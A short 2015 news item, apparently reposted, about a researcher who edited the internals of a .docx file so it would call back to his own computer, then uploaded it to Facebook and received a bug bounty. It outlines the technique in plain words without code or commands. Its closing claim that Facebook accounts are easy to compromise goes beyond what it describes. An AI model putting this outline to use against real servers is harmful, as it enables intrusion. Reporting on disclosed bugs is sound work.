February 4, 2015
The .docx have the particularity of being compressed files whose internal information can be modified if they are decompressed. That is why Ramadan took a random .docx and unzipped it (using the 7zip tool) with the intention of accessing its code and modifying it. Specifically, he changed a line of code to order that Word document to always, wherever it was, communicate with a twin file hosted on the researcher’s computer.
Despite his good idea, Ramadan was aware that things could go wrong. It was likely that, even if he sent the modified document to the server, the file would end up not communicating with the one that was left on his computer.
For this reason, before uploading the manipulated Word to the Facebook server, he checked if it was possible to obtain any results by uploading that document to any other server (specifically to one programmed by himself for the occasion). The result was as expected: several minutes after doing the test, the external server that he had just created was trying to communicate with his computer, so the Facebook one would also do it, and indeed it did.
Although currently the bug is already fixed – and Ramadan has pocketed a reward of about 5,300 euros – its existence shows that compromising Facebook accounts is easier than it seems.
via Beware of Facebook! A researcher has managed to hack it with a Word document – Media Center Spain.
[+] Videos de nuestro canal de YouTube